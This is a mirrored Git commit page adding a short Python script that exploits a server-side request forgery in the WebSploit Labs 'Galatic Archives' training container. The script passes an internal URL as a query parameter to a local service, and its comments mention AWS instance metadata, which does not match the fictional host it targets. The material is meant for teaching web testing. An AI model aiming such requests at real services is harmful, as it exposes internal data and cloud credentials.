mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-10 05:34:12 +00:00
Create ssrf_galatic_archives.py
This commit is contained in:
parent
625f12c5d6
commit
af555144a3
1 changed files with 25 additions and 0 deletions
25
web_application_testing/ssrf_galatic_archives.py
Normal file
25
web_application_testing/ssrf_galatic_archives.py
Normal file
|
@ -0,0 +1,25 @@
|
|||
'''
|
||||
Script to exploit the SSRF in the WebSploit Labs Galatic Archives container.
|
||||
Author: Omar Santos @santosomar
|
||||
'''
|
||||
|
||||
import requests
|
||||
|
||||
# The URL of the vulnerable web service.
|
||||
vulnerable_url = 'http://127.0.0.1:5000'
|
||||
|
||||
# The internal URL that the attacker wants to access.
|
||||
# AWS EC2 instances use this URL to provide instance metadata.
|
||||
# This data should be inaccessible from outside the EC2 instance.
|
||||
internal_url = 'https://internal.secretcorp.org/secret.txt'
|
||||
|
||||
# The attacker constructs the exploit URL by appending the internal URL
|
||||
# as a query parameter to the vulnerable service's URL.
|
||||
exploit_url = vulnerable_url + '?url=' + internal_url
|
||||
|
||||
# The attacker sends a request to the exploit URL.
|
||||
response = requests.get(exploit_url)
|
||||
|
||||
# If the vulnerable server is running inside an AWS EC2 instance, it
|
||||
# will return the instance metadata.
|
||||
print(response.text)
|
Loading…
Reference in a new issue